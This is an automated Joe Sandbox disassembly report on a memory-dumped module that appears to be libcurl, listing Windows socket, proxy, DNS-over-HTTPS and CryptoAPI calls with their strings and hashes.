                                                                                                                                            • Instruction ID: 27c8d445ba56a08d37315c2a603ac858c162836878f31e101736daa13a1e4b39
                                                                                                                                            • Opcode Fuzzy Hash: e26e4d85ed6f4e6f1ad92fb3eae95a188af1c9247c30340d6fa3f0a894c66c6d
                                                                                                                                            • Instruction Fuzzy Hash: 7F51C0B1900216EBDF109F64DA457997BB4FF05314F0042B5FD18AF681EB79E5A0CBA1
                                                                                                                                            APIs
                                                                                                                                            • ioctlsocket.WS2_32(00000000,8004667E,TEwk), ref: 6B79A67A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ioctlsocket
                                                                                                                                            • String ID: TEwk
                                                                                                                                            • API String ID: 3577187118-2841927459
                                                                                                                                            • Opcode ID: 27e12a93ea5cb658c8371d952caa5afabbdf5c473fa9e49cc9e1949ab0ed2089
                                                                                                                                            • Instruction ID: 4d35720da925663ed4a1b446463f0300ac80f42b46a3754e32149b6fb2c4cc69
                                                                                                                                            • Opcode Fuzzy Hash: 27e12a93ea5cb658c8371d952caa5afabbdf5c473fa9e49cc9e1949ab0ed2089
                                                                                                                                            • Instruction Fuzzy Hash: 42D0E97240110CEFCB015E71D8058D97BADEA44265B01C43AB91995111EB35E665DF55
                                                                                                                                            APIs
                                                                                                                                            • WSACloseEvent.WS2_32(50000000), ref: 6B797A66
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseEvent
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2624557715-0
                                                                                                                                            • Opcode ID: fbe951d98c0c64a2008258a0542f3ad92ecac6da50a950a2c71cefcad95c4b30
                                                                                                                                            • Instruction ID: dfa7c8e0a49af2723aaa4782830926f37e7f79daa19a36da1b83d938a73ee4e7
                                                                                                                                            • Opcode Fuzzy Hash: fbe951d98c0c64a2008258a0542f3ad92ecac6da50a950a2c71cefcad95c4b30
                                                                                                                                            • Instruction Fuzzy Hash: BF21F272904610ABEB21AF70FE89B8A77ECEF01718F1400B9F9295B541D77EE544C7A1
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_easy_init
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4195830768-0
                                                                                                                                            • Opcode ID: 80d335f7a67d141ac17e50e64836d70d1bb3964088408b26f835571a19dee21c
                                                                                                                                            • Instruction ID: 017832e1edbd2ecd0da7fa91e01e4b67e387e831336d98e47f8bfeb472f7dcf5
                                                                                                                                            • Opcode Fuzzy Hash: 80d335f7a67d141ac17e50e64836d70d1bb3964088408b26f835571a19dee21c
                                                                                                                                            • Instruction Fuzzy Hash: D3F0B4333002042BDB006AADAE80AEAF7A8FB91178B004077FA1DD7A00D369A51142E1
                                                                                                                                            APIs
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,00000364,00000000,?,6B7CF6DD,00000001,00000364,00000015,000000FF), ref: 6B7CF7CE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                            • Opcode ID: 30e4208853e19bbef813fd46d33a391998f4db3647a66c352c62c3c8006d4259
                                                                                                                                            • Instruction ID: 9e7094f09b560c3aa8b96e75dbd1a97dce0748648eeb09bf63c48405f404635d
                                                                                                                                            • Opcode Fuzzy Hash: 30e4208853e19bbef813fd46d33a391998f4db3647a66c352c62c3c8006d4259
                                                                                                                                            • Instruction Fuzzy Hash: 55F024326051245FEB101B328F05B4F3B48BF42BB1FA1407EF824EE580DB6CD80442A3
                                                                                                                                            APIs
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,6B7D3F01,00000220,?,?,00000000,?,?,?,6B7C84AA,6B7C8987,00000000,?), ref: 6B7D0EEF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                            • Opcode ID: f9b88af43d7bec922e76f9d45c9b4622d11282639469b7f1ab0a30fbef181d0d
                                                                                                                                            • Instruction ID: eaaa5800934fbbf592574c9c1b5165c06bab784cff667b8e64f0ec42fa5361de
                                                                                                                                            • Opcode Fuzzy Hash: f9b88af43d7bec922e76f9d45c9b4622d11282639469b7f1ab0a30fbef181d0d
                                                                                                                                            • Instruction Fuzzy Hash: A6E0E5312491259FEB2036669F25B4F7F48DF827E1F01107CFD64A6580DF1CC80081A1
                                                                                                                                            APIs
                                                                                                                                            • socket.WS2_32(00000017,00000002,00000000), ref: 6B788A3D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: socket
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 98920635-0
                                                                                                                                            • Opcode ID: e1143f09ebc3269ac01e9de927a61af9a329e9c3b44a6d1f1a5ac4aec48deca9
                                                                                                                                            • Instruction ID: 852c1f2658f565af93873b316e82e1746670dfb33af00eb618f5b7d852fbc748
                                                                                                                                            • Opcode Fuzzy Hash: e1143f09ebc3269ac01e9de927a61af9a329e9c3b44a6d1f1a5ac4aec48deca9
                                                                                                                                            • Instruction Fuzzy Hash: B1E086356883046AED005A68EC46FE837984B06769F4442F0F53C9F6E1C765E841A721
                                                                                                                                            APIs
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B77EFA1
                                                                                                                                            • _strncpy.LIBCMT ref: 6B77EFC7
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B77EFE8
                                                                                                                                            • inet_pton.WS2_32(00000017,?,?), ref: 6B77F006
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B77F078
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B77F0A9
                                                                                                                                            • curl_pushheader_bynum.LIBCURL(?,00000000,00000401), ref: 6B77F135
                                                                                                                                            • getsockname.WS2_32(?,?,?), ref: 6B77F1CC
                                                                                                                                            • WSAGetLastError.WS2_32(?,00000100), ref: 6B77F1E2
                                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B77F2ED
                                                                                                                                            • bind.WS2_32(FFFFFFFF,00000017,00000080), ref: 6B77F396
                                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B77F3A4
                                                                                                                                            • getsockname.WS2_32(?,00000017,00000080), ref: 6B77F407
                                                                                                                                            • WSAGetLastError.WS2_32(?,00000100), ref: 6B77F452
                                                                                                                                              • Part of subcall function 6B7AA0E0: GetLastError.KERNEL32(?,?,00000100), ref: 6B7AA0E7
                                                                                                                                              • Part of subcall function 6B7A05D0: curl_mvsnprintf.LIBCURL(?,00000100,6B79C830,?), ref: 6B7A0610
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                             • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                             • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$___from_strstr_to_strchr$getsockname$_strncpybindcurl_mvsnprintfcurl_pushheader_bynuminet_pton
                                                                                                                                            • String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$PORT$bind() failed, we ran out of ports!$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
                                                                                                                                            • API String ID: 1437543408-2383553807
                                                                                                                                            • Opcode ID: 0f00671b409ffe66935537e58786025eae4862bd5e8b0c47ff94aaa7a9ea5276
                                                                                                                                            • Instruction ID: 2714787b9d509fe30483fe5172506376125058bd447e73a78d73997230f0ba6e
                                                                                                                                            • Opcode Fuzzy Hash: 0f00671b409ffe66935537e58786025eae4862bd5e8b0c47ff94aaa7a9ea5276
                                                                                                                                            • Instruction Fuzzy Hash: B032B271D40169ABDF309F24CE45BEEB7B9AF45304F0441F9F858A7240DB3A9A908FA1
                                                                                                                                            Strings
                                                                                                                                            • Excessive user name length for proxy auth, xrefs: 6B7A7AC3
                                                                                                                                            • Failed to resolve "%s" for SOCKS5 connect., xrefs: 6B7A7F06
                                                                                                                                            • SOCKS5: server resolving disabled for hostnames of length > 255 [actual len=%zu], xrefs: 6B7A7712
                                                                                                                                            • SOCKS5 GSS-API protection not yet implemented., xrefs: 6B7A802E
                                                                                                                                            • SOCKS5 connection to %s not supported, xrefs: 6B7A7EDE
                                                                                                                                            • Excessive password length for proxy auth, xrefs: 6B7A7B23
                                                                                                                                            • Unable to negotiate SOCKS5 GSS-API context., xrefs: 6B7A7A0B
                                                                                                                                            • User was rejected by the SOCKS5 server (%d %d)., xrefs: 6B7A7C75
                                                                                                                                            • Failed to send SOCKS5 sub-negotiation request., xrefs: 6B7A7BA7
                                                                                                                                            • SOCKS5 connect to IPv4 %s (locally resolved), xrefs: 6B7A7DD3
                                                                                                                                            • SOCKS5 reply has wrong address type., xrefs: 6B7A81F2
                                                                                                                                            • Unable to receive SOCKS5 sub-negotiation response., xrefs: 6B7A7C2C
                                                                                                                                            • Unable to receive initial SOCKS5 response., xrefs: 6B7A7861
                                                                                                                                            • warning: unsupported value passed to CURLOPT_SOCKS5_AUTH: %lu, xrefs: 6B7A7737
                                                                                                                                            • SOCKS5 reply has wrong version, version should be 5., xrefs: 6B7A80DE
                                                                                                                                            • SOCKS5 GSSAPI per-message authentication is not supported., xrefs: 6B7A7A2F
                                                                                                                                            • Unable to send initial SOCKS5 request., xrefs: 6B7A78B0
                                                                                                                                            • connection to proxy closed, xrefs: 6B7A821A
                                                                                                                                            • Failed to receive SOCKS5 connect request ack., xrefs: 6B7A809F, 6B7A81CE
                                                                                                                                            • unknown, xrefs: 6B7A760C
                                                                                                                                            • No authentication method was acceptable., xrefs: 6B7A7A57
                                                                                                                                            • SOCKS5 connect to IPv6 %s (locally resolved), xrefs: 6B7A7EB5
                                                                                                                                            • Undocumented SOCKS5 mode attempted to be used by server., xrefs: 6B7A7A7B
                                                                                                                                            • Failed to send SOCKS5 connect request., xrefs: 6B7A7FED
                                                                                                                                            • SOCKS5: connecting to HTTP proxy %s port %d, xrefs: 6B7A76ED
                                                                                                                                            • Can't complete SOCKS5 connection to %s. (%d), xrefs: 6B7A8118
                                                                                                                                            • Connection to proxy closed, xrefs: 6B7A790D
                                                                                                                                            • SOCKS5 request granted., xrefs: 6B7A8259
                                                                                                                                            • SOCKS5 connect to %s:%d (remotely resolved), xrefs: 6B7A7F70
                                                                                                                                            • Received invalid version in initial SOCKS5 response., xrefs: 6B7A7940
                                                                                                                                            • :%d, xrefs: 6B7A7D63
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_mvsnprintf$curl_msnprintf
                                                                                                                                            • String ID: :%d$Can't complete SOCKS5 connection to %s. (%d)$Connection to proxy closed$Excessive password length for proxy auth$Excessive user name length for proxy auth$Failed to receive SOCKS5 connect request ack.$Failed to resolve "%s" for SOCKS5 connect.$Failed to send SOCKS5 connect request.$Failed to send SOCKS5 sub-negotiation request.$No authentication method was acceptable.$Received invalid version in initial SOCKS5 response.$SOCKS5 GSS-API protection not yet implemented.$SOCKS5 GSSAPI per-message authentication is not supported.$SOCKS5 connect to %s:%d (remotely resolved)$SOCKS5 connect to IPv4 %s (locally resolved)$SOCKS5 connect to IPv6 %s (locally resolved)$SOCKS5 connection to %s not supported$SOCKS5 reply has wrong address type.$SOCKS5 reply has wrong version, version should be 5.$SOCKS5 request granted.$SOCKS5: connecting to HTTP proxy %s port %d$SOCKS5: server resolving disabled for hostnames of length > 255 [actual len=%zu]$Unable to negotiate SOCKS5 GSS-API context.$Unable to receive SOCKS5 sub-negotiation response.$Unable to receive initial SOCKS5 response.$Unable to send initial SOCKS5 request.$Undocumented SOCKS5 mode attempted to be used by server.$User was rejected by the SOCKS5 server (%d %d).$connection to proxy closed$unknown$warning: unsupported value passed to CURLOPT_SOCKS5_AUTH: %lu
                                                                                                                                            APIs
                                                                                                                                            • curl_pushheader_bynum.LIBCURL(?,?,?,?,?,00000100,?,?,?,?,?,?,?,?,?,?), ref: 6B773AC2
                                                                                                                                            • inet_pton.WS2_32(00000017,?,?), ref: 6B773BA2
                                                                                                                                            • htons.WS2_32(?), ref: 6B773BB9
                                                                                                                                            • inet_pton.WS2_32(00000002,?,?), ref: 6B773CED
                                                                                                                                            • htons.WS2_32(?), ref: 6B773D08
                                                                                                                                              • Part of subcall function 6B7A06B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,$lyk), ref: 6B7A06EF
                                                                                                                                              • Part of subcall function 6B7A06B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B7A072F
                                                                                                                                            • bind.WS2_32(?,?,00000000), ref: 6B773DAF
                                                                                                                                            • htons.WS2_32(?), ref: 6B773DE9
                                                                                                                                            • bind.WS2_32(?,?,00000000), ref: 6B773E02
                                                                                                                                            • getsockname.WS2_32(?,?,00000080), ref: 6B773E3D
                                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B773E4B
                                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B773E91
                                                                                                                                            Strings
                                                                                                                                            • Local port: %hu, xrefs: 6B773EDB
                                                                                                                                            • Name '%s' family %i resolved to '%s' family %i, xrefs: 6B773C90
                                                                                                                                            • Local Interface %s is ip %s using address family %i, xrefs: 6B773B78
                                                                                                                                            • bind failed with errno %d: %s, xrefs: 6B773EB3
                                                                                                                                            • Couldn't bind to '%s', xrefs: 6B773D26
                                                                                                                                            • getsockname() failed with errno %d: %s, xrefs: 6B773E6D
                                                                                                                                            • Bind to local port %hu failed, trying next, xrefs: 6B773DD9
                                                                                                                                            • Couldn't bind to interface '%s', xrefs: 6B773BE4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: htons$ErrorLastbindinet_pton$curl_msnprintfcurl_mvsnprintfcurl_pushheader_bynumgetsockname
                                                                                                                                            • String ID: Bind to local port %hu failed, trying next$Couldn't bind to '%s'$Couldn't bind to interface '%s'$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$getsockname() failed with errno %d: %s
                                                                                                                                            Strings
                                                                                                                                            • Too long SOCKS proxy user name, can't use!, xrefs: 6B7A70C9
                                                                                                                                            • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown., xrefs: 6B7A756A
                                                                                                                                            • SOCKS4%s request granted., xrefs: 6B7A744B
                                                                                                                                            • SOCKS4 connection to %s not supported, xrefs: 6B7A71D6
                                                                                                                                            • Hostname '%s' was found, xrefs: 6B7A7113
                                                                                                                                            • Failed to resolve "%s" for SOCKS4 connect., xrefs: 6B7A71FD
                                                                                                                                            • connection to proxy closed, xrefs: 6B7A73BA
                                                                                                                                            • SOCKS4 non-blocking resolve of %s, xrefs: 6B7A7064
                                                                                                                                            • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids., xrefs: 6B7A7523
                                                                                                                                            • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed., xrefs: 6B7A7495
                                                                                                                                            • SOCKS4: too long host name, xrefs: 6B7A72F5
                                                                                                                                            • SOCKS4 communication to %s:%d, xrefs: 6B7A700A
                                                                                                                                            • SOCKS4: Failed receiving connect request ack: %s, xrefs: 6B7A7392
                                                                                                                                            • Failed to send SOCKS4 connect request., xrefs: 6B7A72D1
                                                                                                                                            • SOCKS4 connect to IPv4 %s (locally resolved), xrefs: 6B7A7188
                                                                                                                                            • SOCKS4 reply has wrong version, version should be 0., xrefs: 6B7A7403
                                                                                                                                            • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client., xrefs: 6B7A74DC
                                                                                                                                            • SOCKS4%s: connecting to HTTP proxy %s port %d, xrefs: 6B7A6FF6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_mvsnprintf
                                                                                                                                            • String ID: Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.$Failed to resolve "%s" for SOCKS4 connect.$Failed to send SOCKS4 connect request.$Hostname '%s' was found$SOCKS4 communication to %s:%d$SOCKS4 connect to IPv4 %s (locally resolved)$SOCKS4 connection to %s not supported$SOCKS4 non-blocking resolve of %s$SOCKS4 reply has wrong version, version should be 0.$SOCKS4%s request granted.$SOCKS4%s: connecting to HTTP proxy %s port %d$SOCKS4: Failed receiving connect request ack: %s$SOCKS4: too long host name$Too long SOCKS proxy user name, can't use!$connection to proxy closed
                                                                                                                                            APIs
                                                                                                                                            • WSAStartup.WS2_32(00000202,?), ref: 6B7AAE75
                                                                                                                                            • WSACleanup.WS2_32 ref: 6B7AAE90
                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,?,?), ref: 6B7AAEBF
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 6B7AAEDD
                                                                                                                                            • _strpbrk.LIBCMT ref: 6B7AAEEF
                                                                                                                                            • LoadLibraryA.KERNEL32(iphlpapi.dll,?,?), ref: 6B7AAF16
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,AddDllDirectory), ref: 6B7AAF2D
                                                                                                                                            • GetSystemDirectoryA.KERNEL32(00000000,00000000), ref: 6B7AAF50
                                                                                                                                            • GetSystemDirectoryA.KERNEL32(00000000,?), ref: 6B7AAF7E
                                                                                                                                            • LoadLibraryA.KERNEL32(00000000,?,?,?), ref: 6B7AAFDB
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,if_nametoindex), ref: 6B7AAFFE
                                                                                                                                            • QueryPerformanceFrequency.KERNEL32(6B7F3B50,?,?,?,?,?,?), ref: 6B7AB033
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$DirectoryLibraryLoadSystem$CleanupFrequencyHandleModulePerformanceQueryStartup_strpbrk
                                                                                                                                            • String ID: AddDllDirectory$LoadLibraryExA$if_nametoindex$iphlpapi.dll$kernel32
                                                                                                                                            APIs
                                                                                                                                            • curl_multi_remove_handle.LIBCURL(?,?,?,00000000,00000000), ref: 6B79DD78
                                                                                                                                              • Part of subcall function 6B7A05D0: curl_mvsnprintf.LIBCURL(?,00000100,6B79C830,?), ref: 6B7A0610
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
• Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
• Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
• Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
• Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_multi_remove_handlecurl_mvsnprintf
                                                                                                                                            • String ID: %s$%s%02x%02x$AAAA$CNAME: %s$Could not DOH-resolve: %s$DOH A: %u.%u.%u.%u$DOH AAAA: $DOH Host name: %s$DOH: %s type %s for %s$TTL: %u seconds$bad error code
                                                                                                                                            • API String ID: 262101408-4053692942
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: alnum$alpha$blank$digit$graph$lower$print$space$upper$xdigit
                                                                                                                                            • API String ID: 0-2602438971
                                                                                                                                            APIs
                                                                                                                                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000040), ref: 6B7920C3
                                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008002,00000000,00000000,00000000), ref: 6B7920DD
                                                                                                                                            • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 6B7920F7
                                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 6B792111
                                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000010,00000000), ref: 6B79212B
                                                                                                                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 6B792139
                                                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 6B792149
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyRelease
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3606780921-0
                                                                                                                                            APIs
                                                                                                                                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000040,?), ref: 6B77803A
                                                                                                                                            • CryptImportKey.ADVAPI32(?,00000208,00000014,00000000,00000000,?,?,?), ref: 6B7780E9
                                                                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000,?), ref: 6B7780F8
                                                                                                                                            • CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000008,00000008,?), ref: 6B77812D
                                                                                                                                            • CryptDestroyKey.ADVAPI32(?), ref: 6B778136
